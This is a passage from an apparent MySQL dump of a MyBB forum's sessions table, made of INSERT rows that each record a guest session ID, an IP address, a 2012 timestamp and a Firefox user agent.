'0', '240.129.235.179', '1352771508', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f23b160b39824fd991fae562279c678', '0', '199.145.144.2', '1352771509', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d320392f25ddc6b19a31e3d7bd96e1f0', '0', '175.172.235.248', '1352771510', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4e3e3c9f241b7b468011841bfb4cb09d', '0', '55.233.28.122', '1352771510', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab4b57f9d1af7633d8f454128eb05bdf', '0', '156.142.199.36', '1352771511', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6960456daa515b56c8c71c65a4180070', '0', '175.156.76.175', '1352771739', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49accc0560866b6823fc184b44ec9386', '0', '148.53.121.145', '1352771520', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b1341257dc138c91941aa2936d781d2', '0', '116.159.168.103', '1352771521', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3219f0a57fe808547981944e1aea3651', '0', '135.13.57.201', '1352771530', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f24a36c3136108a798652a7f3daff2b6', '0', '71.127.5.57', '1352771530', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8fa8822f2cdbadb2176e37661fdb9ff5', '0', '184.227.39.242', '1352771531', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('be3a9f64b99c1b5f83a713f1c6efdc01', '0', '72.186.29.57', '1352771533', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3264c576c88e69dd8b398220d51a6336', '0', '97.130.71.129', '1352771535', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a7090c17453214ba6e3ee656248b9322', '0', '107.209.93.132', '1352771548', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2bcbd36ce9a2980c5b254350ccb01d6c', '0', '218.179.241.59', '1352771548', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c88ae9b26edfa0974c4910b39cc50988', '0', '248.94.188.153', '1352771551', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b6ef4e07ad1de8609acbd24b7c191367', '0', '167.175.23.72', '1352771552', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c092e9247f8d549d205b1bb98f8a72fd', '0', '244.246.151.148', '1352771554', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2907b813ce26dd51a3d9ddc8a6ddab12', '0', '88.69.109.190', '1352771555', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4dd8d8d2b51c0fe36df8e704de7b991f', '0', '203.205.72.58', '1352771556', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b2d7d9e7f23a7bfed98ed7d96ee1603', '0', '196.209.121.247', '1352771557', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3d615aa807ce9d0ea221a9c5709bdef3', '0', '45.216.172.97', '1352771559', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('891ed30d2ffc0d9ed147711efe4152ee', '0', '231.214.209.35', '1352771560', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2b335020069eae510e82669971a0b4a4', '0', '231.230.194.49', '1352771560', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d2c96a3b380d2e079c0023d5c1efaa3e', '0', '203.34.133.166', '1352771565', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d7de02db53336629cc97ee6a70f4b7c', '0', '69.225.21.173', '1352771621', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1956c41daa329895be14d792c6bb7e34', '0', '71.66.204.31', '1352771565', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8928f06bbad30a12dce31f69f3a1b903', '0', '69.23.250.62', '1352771566', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('536c58129f8986804d2d19d05c98d8c9', '0', '194.229.241.108', '1352771567', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0040fa91797a6f21e75c217e81b97003', '0', '249.96.149.232', '1352771567', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84af1cae60a232b77507025e97a01406', '0', '139.84.187.241', '1352771568', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('48a6755e54794775c31b22a59ed70cb4', '0', '233.195.70.67', '1352771568', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f5af8d24c9930f3fa71a5909a9ee9d5b', '0', '41.252.243.24', '1352771569', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5e98c82246ade3e52779cbb7127c7ab', '0', '193.37.166.24', '1352771570', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c6e9a3c3497c7d1152cbbefa2a9b44a', '0', '108.126.206.217', '1352771571', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('54ae12ef14615504373f558fbbb02836', '0', '164.179.132.31', '1352771571', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb01f1406c392e9f7296ac470c4767b2', '0', '69.120.209.86', '1352771572', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2453d56bf94f2176d83d5cda208c6065', '0', '222.207.143.195', '1352771573', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('64148aaa93eabd36cd39d014ff82a162', '0', '105.185.13.186', '1352771574', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d1baffef60a51c3c97eb3dc0325e389d', '0', '160.218.128.198', '1352771574', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c2804eb7c73afaaa1a6282ec3ff5747', '0', '151.236.137.163', '1352771577', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('93ec29998568db3be79813f900cd33b3', '0', '15.142.107.211', '1352771580', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eb20db3b4367764aeec969422dee79cc', '0', '167.160.204.208', '1352771582', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c341b67540f20f268624213c5f404c68', '0', '14.99.191.160', '1352771584', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('57ac0319639a031109402439559662eb', '0', '86.103.92.96', '1352771586', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8c6cb82fa2563936ba74b97cc317a931', '0', '165.25.207.20', '1352771588', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b50444678bfd7244d330e67cf0ec5007', '0', '105.154.253.87', '1352771589', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4e8a3dd13c4a622e1bac55ab722a75b6', '0', '109.179.228.57', '1352771590', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7150591ccd30af07a3f7a580bfbb39fa', '0', '89.2.119.6', '1352771591', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc4738a54301bf571c80bd1035649e56', '0', '229.205.208.25', '1352771591', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea65e310d53749a5d9865d8aa6574fe6', '0', '240.161.56.127', '1352771592', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b107dbb7aeb96a26ba1165de85ba73b5', '0', '135.239.230.206', '1352771592', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1a370a42d23c7c4a651c98f8213a9b9', '0', '194.123.45.21', '1352771593', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('934a8e2b654a28a5ff30da2a843325b5', '0', '178.114.239.93', '1352771594', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('77509351c3417aacc42cd6488f0e2cb2', '0', '211.47.116.24', '1352771596', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4c1001303ba18539420208078b2f4424', '0', '151.104.235.3', '1352771597', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a102b640ca949c42366980fa6c39a924', '0', '203.227.163.209', '1352771598', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6921be290e659b168d211eb53a0769fd', '0', '220.92.10.230', '1352771599', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('29ee85ba7c463557453f969fe1cf22fe', '0', '180.110.66.194', '1352771602', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('30089b093c28ae4ba7f1e9d50024e80b', '0', '187.86.5.242', '1352771604', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0a255880d6adf8db2db6e086a5da19f6', '0', '128.200.78.220', '1352771604', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e2a1361b40b4da9f9998f85ba5dc5720', '0', '190.58.67.68', '1352771605', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8b79d2545957ec8cedfad7c3d57eb36', '0', '151.229.33.200', '1352771606', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('58f0fc60a28ebe045c9c9871acd0162a', '0', '76.125.40.151', '1352771608', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('15c097cc7bfc6fdcd3eea1367d854cb0', '0', '255.171.124.97', '1352771608', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f9546442e65235462f9dd6fc0305cff1', '0', '15.36.132.72', '1352771609', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('970c498a28fcf9b91122b1da5624e54c', '0', '47.19.37.215', '1352771610', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8da9d1c3e3e6d69b848856e1ba8e4d01', '0', '52.107.127.59', '1352771612', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b93debb5b39abad8d2af20005b75fab1', '0', '11.86.183.166', '1352771612', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6f9a6df882f2d5295940cb3f2c0d161', '0', '163.61.170.221', '1352771613', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('051feba6ed56e6b50a77143d334cfd86', '0', '108.209.80.214', '1352771615', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0ae19d3b2ca14ba63d15381c6ed2a9e', '0', '211.46.203.27', '1352771616', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4947e6c24e6eedf3f93d2175bbaeeaa9', '0', '239.175.32.213', '1352771624', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b53b9d2c23cdccd0f7f677ca9e20660d', '0', '192.175.197.222', '1352771624', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('202f4a8664b29fe6c04ec2f112d4c338', '0', '243.152.108.109', '1352771625', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a1f4a64993d583ee2d501362c75c65c', '0', '180.45.176.139', '1352771626', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aaf05233d43928ec89cfec6e45207fff', '0', '113.107.66.106', '1352771627', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('89dd28ff2d1a9c34baea9fb0ffb620a2', '0', '197.2.35.146', '1352771628', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bca2934405e48d707e920dbe75072d99', '0', '220.15.58.143', '1352771629', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8fcdb3cd636bc16c95258c33b09b6b82', '0', '42.85.47.123', '1352771630', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; 